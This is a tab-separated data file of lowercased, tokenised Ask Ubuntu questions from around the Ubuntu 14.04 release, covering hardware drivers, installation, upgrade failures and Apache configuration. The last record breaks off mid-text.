449220	dual monitor setup not working even though xrandr reports two monitors	i re installed ubuntu 13.10 and now my dual monitor setup is not working . one of my monitors currently works fine . however , the other is black . the strange thing is that xrandr is reporting two monitors connected : screen 0 : minimum 320 x 200 , current 2560 x 1024 , maximum 8192 x 8192 dvi-i-1 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dvi-i-2 connected 1280x1024+1280+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 here is output from lshw -c video : *-display description : vga compatible controller product : g98 [ geforce 9300 ge ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : fc000000-fcffffff memory : d0000000-dfffffff memory : fa000000-fbffffff ioport : dc80 ( size=128 ) memory : fde00000-fde1ffff i 'm not sure what 's going wrong here or what i can do to fix it .
449222	problem accessing hard disk from administrator account	i logged in to my guest account and read the hard disk drive by entering the password and then i logged out from guest account and then log in to administrator account after doing this i am not able to read the hard disk drive whenever i click on it , it prompts a window which says `` the location can not be displayed . you do not have the permissions necessary to view the contents of âdrive nameâ . ''
449225	install ubuntu desktop on software raid 1 ( mirror ) with encryption	i used to use ubuntu 12.04 alternate installer to setup my old raid1 + encryption system . with the new lts 14.04 ( beta 2 ) i found the alternate installer missing which complicates installation on a raid1 a lot . textbased installation does n't work because it fails to autmatically setup wifi . my question is : how do you install ubuntu desktop on a software raid 1 with encryption ? here 's what i tried : idea 1 . install on first hard disk and create raid afterwards did n't work because `` disks '' warns about erasing everything . idea 2 . use netboot installer while in principal this would work ( tested in a virtualmachine ) i ca n't get my wireless interface to work . ( a work around would be to setup a plain wired interface but right now i 'd like to avoid setting something like this up . ) idea 3 . use server installer i also tested this in a virtualmachine but apparently there is no desktop package available in the installer ( which is available in netboot installer ) . i assume this can be installed afterwards from console but my fear is that i wo n't get the original ubuntu desktop experience . what are the differences between desktop and server+desktop package ? ( thread about server installation ) idea 4 . create a raid1 from unformatted disks and install on the raid1 installation works except for the last step which shows the error '' ca n't install grub on /dev/md127p1 '' . i also tried to install it on any other partition without success . i also followed the tutorial mentioned in this thread but got stuck when i had to add the encryption partition . format the /dev/md0 as crypto wait for /dev/mapper/crypto1 to appear format crypto1 with partition table create ext4 partition btw : there is no option to create lvms that the simple install option provides o_o idea 5 : use `` try ubuntu '' and run text installer does anyone know how to start the text installer from within the graphical live system ?
449227	i tried to use the software updater but it does n't give the upgrade option	i launched the software updater to upgrade from 13.10 to 14.04 but the updater does n't give the upgrade option . the version on the ubuntu 14.04 shows an upgrade button on the updater .
449231	ubuntu server 14.04 ( final release ) does n't boot	i just downloaded and installed ubuntu server 14.04 on an embedded pc ( amd g-t40e dual-core processor , 4gb ram , 30gb intel ssd installed in the mini pci-e slot ) . this same machine runs 12.04 just fine . i chose the 'use entire disk ' option , and the installation process proceeds fine until complete and i 'm prompted to reboot . upon reboot , nothing shows up on the display and for a couple of seconds there is hdd activity , but still nothing appears on the screen . i have run the install twice with the same result . any idea on how to troubleshoot ?
449232	problem installing 14.04 in vmplayer	i 'm just trying to install ubuntu 14.04 in vmware player . it has a single huge ( 300 gb ) partition and so i expect it to take some time , but after a few minutes , this message came i 'm unsure what it 's doing now . zeroing 300 gb surely takes some time , but the current disk usage is according to du only 11 gb and it does n't change since maybe an hour . nautilus reports 3.8 gb ( i do n't care why these numbers differ ) . i wonder where the write same failed comes from . all i find out is that it happens with some raid controllers , but the partition i placed the vm on is an encrypted software raid partition and imho the guest os should care ( or even know it ) . the vmware player uses some 40 % cpu and iostat 30 shows avg-cpu : % user % nice % system % iowait % steal % idle 4.85 0.67 10.66 0.17 0.00 83.65 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sda 11.07 0.00 113.60 0 3408 sdb 0.80 0.00 8.27 0 248 sdc 0.80 0.00 8.27 0 248 sde 0.73 0.00 5.87 0 176 sdd 0.73 0.00 5.87 0 176 md0 0.97 0.00 7.73 0 232 dm-0 0.00 0.00 0.00 0 0 dm-1 0.00 0.00 0.00 0 0 dm-2 0.00 0.00 0.00 0 0 dm-3 0.00 0.00 0.00 0 0 dm-4 0.00 0.00 0.00 0 0 dm-5 0.97 0.00 7.73 0 232 dm-6 0.00 0.00 0.00 0 0 i guess it means that nothing 's happening as the only activity is on sda which contains the host 's / and /home , but not the raid . an old 10.04 vm runs without problems on the same system . what 's going on ? what should i do ?
449235	browsing is painfully slow	either it 's firefox or chromium - browsing is painfully slow for some reason . it just takes lots of time to do anything : open a tab , load a website , etc . my internet is really fast and other programs run fast , but the browsing is really too slow . what can i do ? btw , i ran htop , it shows that these 2 browsing programs take lots of cpu , sometimes over 100 % . also , the same thing happens in xubuntu and ubuntu . i have 3gb ram . and previously it worked much better .
449237	wifi [ model : mt7630e ] and bluetooth not working on ubuntu 14.04 lts	i am using hp pavilion 15 -no11tu which has been awarded the status of enabled for ubuntu . i.e . all the hardware are certified by ubuntu but still no drivers available . the same problem was with ubuntu 12.04 lts and still persist with ubuntu 14.04 lts . many people reported this as a bug : https : //answers.launchpad.net/ubuntu/+question/243203 https : //answers.launchpad.net/ubuntu/+question/243203 after doing all sorts of updates and upgrades , the problem still persist . ht @ htcodersinc : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : mt7630e 802.11bgn wireless network adapter vendor : mediatek corp. physical id : 0 bus info : pci @ 0000:08:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b2500000-b25fffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 08 serial : 00:11:22:33:44:55 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-2_0.0.1 04/23/13 ip=172.16.233.210 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:59 ioport:3000 ( size=256 ) memory : b2404000-b2404fff memory : b2400000-b2403fff ht @ htcodersinc : ~ $ lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.1 pci bridge : intel corporation lynx point-lp pci express root port 2 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5227 pci express card reader ( rev 01 ) 08:00.0 network controller : mediatek corp. mt7630e 802.11bgn wireless network adapter 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 08 ) ht @ htcodersinc : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:11:22:33:44:55 inet addr:172.16.233.210 bcast:172.16.233.255 mask:255.255.255.0 inet6 addr : fe80 : :211:22ff : fe33:4455/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:189852 errors:0 dropped:117 overruns:0 frame:0 tx packets:101829 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:148352738 ( 148.3 mb ) tx bytes:11398350 ( 11.3 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3210 errors:0 dropped:0 overruns:0 frame:0 tx packets:3210 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:275585 ( 275.5 kb ) tx bytes:275585 ( 275.5 kb )
449239	running apache as ftp users	i have an ubuntu server . apache , mysql and vsftpd are running on it and it hosts more than one web sites . every web site owner has an ftp user to upload files . however , apache is running as www-data , as default . thus , the files uploaded using wordpress and cache files created by caching plugins of wordpress are owned by www-data . in order to upload files one must make his folder 's permission 777 , which is not safe . should i make apache run as separate users for each customer ?
449250	how to get/enable the new locally integrated menus ( lim ) inside of the windows titlebar ?	i hear about this new feature , but do n't know how to enable it . it look as this do anyone have any idea how to enable this ? and is it possible to get it on other desktop environments like xfce ?
449251	how to chroot [ android ] on top of [ ubuntu ]	i know i can run ubuntu on android : with a chroot ( linux installer , etc from market ) but how does one run android chroot under ubuntu ?
449252	read error and grub rescue	my dell inspiron 7420 laptop had windows7 ( home preimium ) and ubuntu 13.04 gnome i386 dual boot , and since 4 months i started getting this read error on boot up or sometimes even error no such partition , grub rescue but after trying again and again sometime it started normally many times i formatted even windows and ubuntu both after that it works for few days or few hours and again starts giving the same error on formatting c drive and installing windows7 again today this time i found another error a disk read error ocurred , press ctrl+alt+del to restart this never happened earlier . i thought it would be some problem with grub but after seeing this error today i was confused . i also tried testing hard disk for bad sectors and read errors using dell diagnostics , chk disk utility , surface tests and hiren 's boot disk but found nothing . what should i do ? ? is it a hardware problem ? ? or just some problem with the os ?
449253	disabling a second gpu ?	i have both an amd ( hd 7850 ) and an nvidia ( 8400 gs ) gpu installed on my motherboard . the nvidia card is only there because of its s-video port , which i use to output to my old'n'bulky crt tv . i have no need of it in ubuntu , and things seem to get fussy at times because of its presence . i was wondering if there was any way to make ubuntu ignore its existence . i know that it 's possible to disable the nvidia gpu in windows via the device manager , but i 've so far been unable to find a similar method in ubuntu . any ideas ? please let me know if there is any other information that i should provide : ) system specs : os : ubuntu 14.04 motherboard : ga-990fxa-ud3 rev 1.1 f9 bios cpu : amd phenom ii x4 965 be gpu 1 : amd radeon hd 7850 gpu 2 : nvidia 8400 gs spu : creative audigy 4 - sound blaster
449255	the application manager does n't find the update	i ca n't find trusty tar . this update seems somewhat half-baked .
449264	how to go into a directory from an archive using the terminal ?	like i use cd to go into a normal directory , how to cd into a directory from an archive ( compressed file , such as .zip , .tar.gz , etc . ) and see its content using the terminal ? is this possible ?
449265	black screen on ubuntu install + garbled installer	my desktop is black and every window is garbled . in have 2 amd radeon 7790s in crossfire and fx 8core cpu at 4.6ghz each . 16gb of ram . the unity bar and dash icon are coloured with the default background 's colours but the desktop is entirely black and every window is garbled . i can not install because of this . this has happened with every version of ubuntu i have tried to install . does it not like crossfire or something , or is my hardware too new ?
449270	serious errors were found while checking the disk drive for / . - ubuntu 14.04	i installed ubuntu 14.04 with wubi inside windows 7 and then after installation is completed and system is about to start it shows -serious errors were found while checking the disk drive for / . if i ignore then it shows : -the disk drive for /tmp is not ready yet or not present then if i skip -an error occurred while mounting / . if i skip that too it shows ubuntu 14.04 lts tty1 requires login . and gui never shows . why does this happen ? i tried reinstalling and same thing happens . any idea ?
449271	ubuntu 14.04 installation with usb flash drive problem	i have problems while trying to install ubuntu 14.04 using usb flash drive . i tried to create bootable usb flash drive with unetbootin and startup disk creator but when i boot from flash drive i get error 8001 reading sector 'some_number' do i need to set some boot options or what ?
449273	strange behaviour with apache virtualhost	i 've got bugzilla set up as a virtualhost ( see definition below ) accessible only within a lan that is behaving strangely . if i point the browser to bugzilla.daedalus , bugzilla does not load up and instead i 'm presented with the perl script ( page does n't render ) ; it renders correctly if i navigate to daedalus instead though . why ? < virtualhost *:80 > servername bugzilla.daedalus serveradmin **** @ gmail.com # censored documentroot /var/www/bugzilla-4.4.2 < directory /var/www/bugzilla-4.4.2 > options +indexes +execcgi -multiviews +symlinksifownermatch +followsymlinks allowoverride all order allow , deny allow from all addhandler cgi-script .cgi .pl < /directory > < /virtualhost > running apache 2.4.6 .
449278	heroes of newerth lagging periodically	everything was fine on ubuntu 12.04 . today when i moved to ubuntu 14.04 and installed hon everything was fine , game loaded game started normally , in the game everything working fine just i have lags periodically ( every 1-2 min ) . this lag is not long about couple of seconds.but when i have lags in team fights that make me lose a game ! however i made contact with s2games ( support for hon ) and they are not sure what make this lags . so please help me . i have laptop asus k50in ( all performances in game are on low ) and i 'm using ubuntu 14.04 unity .
449280	upgrade manager does n't finds ubuntu 14.04	i have 13.10 installed and would like to upgrade to 14.04 . how would be this possible ? if i do it like the manual says then i can update only to the devel version of ubuntu which i would like not .
449283	problem with deb installation alien converter	i tried to install unsupported jupiter on ubuntu 14.04 , i got the jupiter-0.1.7-1.noarch.rpm from sourceforge and converted to deb with : sudo alien -k jupiter-0.1.7-1.noarch.rpm then alien generated jupiter_0.1.7-1_all.deb then i tried this sudo dpkg -i jupiter_0.1.7-1_all.deb so then dpkg throws this error ( leyendo la base de datos ... 171516 archivos o directorios instalados actualmente . ) preparing to unpack jupiter_0.1.7-1_all.deb ... unpacking jupiter ( 0.1.7-1 ) over ( 0.1.7-1 ) ... configurando jupiter ( 0.1.7-1 ) ... chown : grupo inválido : « : jupiter» dpkg : error al procesar el paquete jupiter ( -- install ) : el subproceso instalado el script post-installation devolvió el código de salida de error 1 processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... se encontraron errores al procesar : jupiter then i googled and i read that alien generates this file when converts the rpm packages iinto deb /var/lib/dpkg/info/jupiter.postinst and this file contain : # ! /bin/sh # alien added permissions fixup code chown ' : jupiter ' '/var/jupiter' i have only one user and is not jupiter so can you help me with that ?
449284	10 minutes in start after install nvidia	after installing nvidia after reboot it take to show the login almost 10 minutes , i found reading to review the log , but do not understand it to be , i see these lines there is something unusual as it goes a long time . from 11 to 532. as i can do to not delay so long to start . [ 11.217 ] ( ** ) nvidia ( 0 ) : nvidia sli disabled . [ 11.217 ] ( ** ) nvidia ( 0 ) : nvidia multi-gpu disabled . [ 11.217 ] ( ** ) nvidia ( 0 ) : option `` metamodes '' `` vga-0 : nvidia-auto-select +0+0 , lvds-0 : null '' [ 11.217 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 532.201 ] ( ii ) nvidia ( 0 ) : display ( dell u2412m ( crt-0 ) ) does not support nvidia 3d [ 532.201 ] ( ii ) nvidia ( 0 ) : vision stereo . [ 532.201 ] ( ii ) nvidia ( 0 ) : display ( seiko/epson ( dfp-0 ) ) does not support nvidia 3d [ 532.201 ] ( ii ) nvidia ( 0 ) : vision stereo . [ 532.201 ] ( ii ) nvidia ( gpu-0 ) : found drm driver nvidia-drm ( 20130102 ) [ 532.204 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 525m ( gf108 ) at pci:1:0:0 ( gpu-0 ) [ 532.204 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 532.204 ] ( -- ) nvidia ( 0 ) : videobios : 70.08.54.00.0b [ 532.204 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 532.210 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 525m at pci:1:0:0 [ 532.210 ] ( -- ) nvidia ( 0 ) : dell u2412m ( crt-0 ) ( connected ) [ 532.210 ] ( -- ) nvidia ( 0 ) : seiko/epson ( dfp-0 ) ( boot , connected ) [ 532.210 ] ( -- ) nvidia ( 0 ) : dfp-1 ubuntu 14 64bits core : intel® core™ i5-2410m cpu @ 2.30ghz × 4 nvidia : geforce gt 525m/pcie/sse2
449285	is synapse application launcher available ?	i really like that synapse application launcher , but there seems to be no way of installing it in ubuntu 14.04 . any ideas why ? or does anyone know how i could get it ?
449288	ubuntu 12.04 to 14.04 lts upgrade crash !	i 'm in a pretty bad situation right now . i ran the following terminal commands to upgrade my laptop from 12.04 lts to 14.04 lts , and left my computer to let it sit to do its thing . when i came back , the terminal window that was running the upgrade contained some prompt about installing an upgrade to the package manager . the moment i touched my keyboard to respond to said prompt , the terminal window closed mid upgrade ... commands i ran : $ sudo apt-get update $ sudo apt-get install update-manager-core $ sudo do-release-upgrade i 'm not to concerned about those , since they were working . only felt the need to use them because my update manage still had n't picked up 14.04 by like 4:00pm today and that 's the way i know to make it grab it . how can i fix things and get my system sane again ? i 'm currently able to use it , it 's just the following issues are present : any time i try to access the update manager , i see a prompt with the header `` not all updates can be installed '' with details and the options `` partial upgrade '' and `` continue '' . clicking continue gets me the following message . software index is broken : it is impossible to install or remove any software . please use the package manager '' synaptic '' or run `` sudo apt-get install -f '' in a terminal to fix this issue at first . '' trying to run the mentioned command generates the terminal error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? lsb_release.a lists that i am on 14.04 , but i definitely appear to be between versions . i 've tried to re-start the upgrade process but get greeted with the same error in the terminal window that i mentioned earlier when i do . i have n't attempted a system reboot , but i 'm scared to , since i think it will break my os . how on earth can i fix this mess ?
449290	log in problems ubuntu 13.04	i have just installed ubuntu 13.04 as a dual alongside windows 7 using the wubi installation . no as i try to log in i can only log in as guest , has anyone else encounters this problem and if so have a solution
449296	how can i clear out the disk ( reformat ) when i 'm installing ubuntu server ?	i 'm installing ubuntu server 14.04 . i had an old install ( 12.04 ) with lots of junk on in , so i 'd like to remove all the stuff . i ca n't seem to find a an obvious option for clearing out the old disk . the system gives me the option of 'using the entire disk ' in the partition menu . would this do the trick ?
449297	apache2 can not find sites after update	after i updated my server 1 hour ago to 14.04 lts i ca n't find/load the sites hosted on that server . i use apache2 and have n't really configured anything else than 2 enabled sites on it . as of now the site only shows all destinations as empty directories . the sites are still on the server and looks to be intact but somehow unreachable .
449299	huge problems after upgrade to 14.04 ( selinixfs boot error )	so , i 've ended up in a bad spot after attempting to upgrade to 14.04 . i upgraded to tahr using the terminal , and that was running smoothly until i rebooted to mount failed at selinuxfs on sys/fs/selinux no such file or directive this happened directly after the mandatory reboot after upgrading . i 've tried running i 'm recovery mode , but that 's impossible to use since it freezes , and the mouse disappears . i have no usb or cd for this . this was an upgrade using terminal and i have no way of recovering . there is the prompt to continue to wait , or press s to skip mounting or m for manual recovery . i ca n't do this because i 'm not getting any response from my keyboard .
449304	why can not i see some files on shared folder of virtualbox ?	i tried to share mounted ntfs drive on my ubuntu to virtualbox ( installed winxp sp3 ) but something weird was happened . my sharing folder process was success but when i tried to access my shared folder via virtualbox ( winxp ) i found that some files were showed and some file were missing . i do n't know why . can you tell me how to solve this problem ?
449305	problem with microfone of laptop	i am using dell 覺nsp覺ron 1420 and i have problem with microfone of this laptop i am using ubuntu 13.10 i can not manage the microfone of this laptop . for example when i try to make a voice record , the record says that `` you recorded nothing . please check your micofone is working . '' there was a problem like this when i first install ubuntu on this laptop . it was a wireless problem actually . but when i write this command on terminal and after a restarting laptop it just started to connect as wireless without any problem : sudo apt-get install linux-firmware-nonfree this is just an example . i am wondering that the reason of this microfone problem is a missing device that i need to install , just like wireless connection problem . ps : i need to make an important skype conservation tomorrow so it is very important for me . thanks advance .
449309	networking wireless ethernet adapter	anydata wireless ethernet adapter # 2 ( usb modem with cd drive for tcma setup - anydata hs-usb modem for internet connection ) can`t install on ubuntu 13.10 and connect on internet .
449310	vmware workstation 10.0.1 install wo n't work 14.04	so i switched to the new version of ubuntu ( 14.04 ) and , as expected , i ran into some problems . now i usually just go around on google and look for answers but since it 's on 14.04 i did n't found any good way to solve the problem . so i downloaded the .bundle file , x64 ( matches my version ) sudo bash the whole thing , get to the installation windows . i complete the installation successfully ( like on 12.04 and 13.10 ) but when i launch vmware i get : '' before you can run vmware , several modules must be compiled and loaded into the running kernel '' i have the option `` cancel '' ( obviously not the one i want ) and the option `` install '' ( i clicked that one ) i am prompted to enter my password and a second installation process launches and ( boom ) pop-up window `` unable to start services see log file bla bla bla '' went to check the log file but i can barely understand what it means . maybe you can ? here it is : http : //pastebin.com/xqqsdvug so yeah , please help me , i never had this problem before . thanks !
449311	i7 temperature too high	i use ubuntu 14.04 and a notebook with i7 cpu . the problem is that i 've 50째 on cpu in idle , while in windows i 've 40째 . can you tell me why i 've this problem ? i 've also installed nvidia proper driver for optimal dual-gpu management but problem is not solved.. cpu scaling works , in idle cpu is 800 mhz .
449312	bluetooth apple keyboard connects but unresponsive	so i upgraded to 14.04 today , and once everything was installed i noticed that my apple bluetooth keyboard stopped working . it was working fine in 12.04 . the keyboard pairs and connects fine , and i have noticed that every time i press a button on the keyboard the bluetooth icon has a little lock next to it . but once i stop typing the lock goes away . is there some sort of keyboard lock i am unaware of ? hope to get this resolved soon thanks again
449315	issue with encrypted lvm during setup	how can i access a different form of partitioning , like in old alternate cd 's or debian 's installer , where i can choose to create a partition , make it encrypted , then add a lvm group to that encrypted partition and add swap , home , root partitions under it , so there is one luks process and all partitions are unlocked via same key ?
449316	will ubuntu 12.04 be automatically upgraded to 14.04 ?	do i have to do something to upgrade to 14.04 from 12.04 ?
449318	why i had redirected while downloading ubuntu iso ?	usually when i download a ubuntu iso from ubuntu.com , i got it from *.ubuntu.com path , a while ago ; when i started the 14.04 download , i got redirected to http : //d3g7pb956c5s5x.cloudfront.net/ubuntu-14.04-desktop-amd64.iso is there any change in ubuntu back-ends ? or this just temporarily for the download spike on 14.04 release ? note : i use getright as a download manager and it could n't find any other mirror having 14.04 new iso ( not even on ubuntu.com ! )
449325	failed upgrade of [ l ] /x ] ubuntu 13.10 to 14.04	i just upgraded an old ( dell celeron ) desktop from x/l ubuntu 13.10 to 14.04 today . there were errors in the upgrade , including a failed samba upgrade . i now have a system that is unusable . i can not su - or sudo or get to the user management app . without a segmentation fault . the software-updater also fails . i am reluctant to wipe the partition and install 14.04 from an iso as i have a lot of things installed which would take me hours and hours to reinstall . any suggestions ?
449326	installation error in sklearn for python3	when i run the command sudo pip3 install -u scikit-learn i receive a strange error . cleaning up ... command /usr/bin/python3 -c `` import setuptools , tokenize ; __file__='/tmp/pip_build_root/scikit-learn/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-hrwadcyq-record/install-record.txt -- single-version-externally-managed -- compile failed with error code 1 in /tmp/pip_build_root/scikit-learn storing debug log for failure in /home/donbeo/.pip/pip.log here the link with the log file . https : //drive.google.com/file/d/0b3fiuca5bzuauc1pd21mtufxwku/edit ? usp=sharing i have not any idea of how to solve the problem .
449327	how do i get crossover to recognise a disc in my disc drive ?	i am using crossover 12.5.0 on ubuntu 12.04 lts . it works fine for software that is not disc dependent after installation , but not for disc dependent software . i installed halo on crossover and it installed with out problems , but when i go to play it crossover tells me that i need to insert the halo disc into my disc drive ( which it already is ) . why does n't crossover autocratically read my disc drive and how can i fix this so i can use disc dependent software ?
449328	incremental backups using dejadup to cloud like dropbox , gdrive on 14.04	i 'd like to have an incremental backup of a synced folder into a cloud service using dejadup . the same thing i used to do with ubuntuone that now is no more available . i 'd like to use free cloud services like dropbox or gdrive . i 'm not interested in using dropbox but to have incremental backups on a cloud like dropbox .
449329	osx mavericks and ubuntu 13.10	first off , i am almost new to linux and this is my first time installing as a dual boot . so i followed the ubuntu walk-through but used the refind tool . it seems to be working ok but its not as nice as i would like . i have multiple options . the 1st one takes me to ubuntu grub where i can pick osx , ubuntu new kernel and old ones . the 2nd option is osx , the 3rd option boots ubuntu ( skips grub ) and the last few are older kernel versions . when i uninstall refind my only option to boot is a drive called efi but it boots directly to osx . what i want to have for boot options . i want it to automatically boot to osx and when i hold down option i want my choices to be 1 . macintosh hd ( it seems that efi somehow replaced the macintosh hd name , i would like to change it back . ) 2 . boot to ubuntu and skip the grub 3 . optional 3rd option that boots to ubuntu grub this can be an alternate option if the above is not possible . boot to ubuntu grub where i can pick my boot option . please let me know if this is possible and how i can go about it . thank you ! !
449331	how to get copy.com notification icon on unity on trusty to work ?	do you guys know how to get copy 's systray icon to work ? that 's an old question and the old fix does n't work no more.. i 've already tried : sudo apt-get install libappindicator1 and the other : sudo apt-get install libcanberra-gtk-module and since ubuntu retired whitelisting ( partially in 13.04 and - as my understanding goes - totally in 14.04 : there is no com.canonical.unity.panel schema at all ) , do you guys have a fix for that ? edit : i ultimately made the systray icon show up by doing the two last commands and creating a folder .icons in my home folder . mkdir -p ~/.icons but the menu is still messed up : any suggestions ? p.s : i think we might be close to what seems to be a fix..
449332	display limited to 4:3 in oracle vm installation of 14.4	the display is limited hence i ca n't see the full display , impossible to correct as ca n't see the install button at the end of the line i tried to install nvidia from command line but the system hung any help ?
449334	clementine wo n't load ubuntu theme	in ubuntu 14.04 , clementine has a ugly theme because is not loading the correct ubuntu theme . i have the 64 bits installation . i know the bug with skype and i already installed murrine engine gtk2 and other gtk2 engine . in skype is fixed but in clementine the problem continues
449335	mouse sensitivity in 14.04 dissapeared	if i go to `` settings - > mouse & touchpad '' in ubuntu 14.04 all the options are gone ! how can i bring them back ?
449336	kubuntu 14.04 - wireless connects but can not ping or navigate	i just installed kubuntu 14.04 . wi-fi scans correctly the networks , connects correctly via wpa to the wifi network , but ca n't ping 8.8.8.8 or navigate . any hints ? here follows a report : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux pippo-easynote-tm86 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm57780 gigabit ethernet pcie [ 14e4:1692 ] ( rev 01 ) subsystem : acer incorporated [ ali ] device [ 1025:036d ] kernel driver in use : tg3 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8192se wireless lan controller [ 10ec:8174 ] ( rev 10 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8186 ] kernel driver in use : rtl8192se # # # # # lsusb # # # # # bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0402:9665 ali corp. gateway webcam bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country it : ( 2402 - 2482 @ 40 ) , ( n/a , 20 ) ( 5170 - 5250 @ 40 ) , ( n/a , 20 ) ( 5250 - 5330 @ 40 ) , ( n/a , 20 ) , dfs ( 5490 - 5710 @ 40 ) , ( n/a , 27 ) , dfs ( 57240 - 65880 @ 2160 ) , ( n/a , 40 ) , no-outdoor # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' network '' mode : managed frequency:2.427 ghz access point : < mac address removed > bit rate=1 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=62/70 signal level=-48 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search digicom-adsl # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 [ network ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8192se state : connected default : yes hw address : < mac address removed > capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) giusti1 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 100 wpa infostradawifi-682c88 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 14 wpa wpa2 alice-53393313 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 100 wpa wpa2 giusti3 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 30 wpa visca : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 14 wpa wpa2 tina : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 84 wpa telecom-64125432 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 wep palandri : infra , < mac address removed > , freq 2462 mhz , 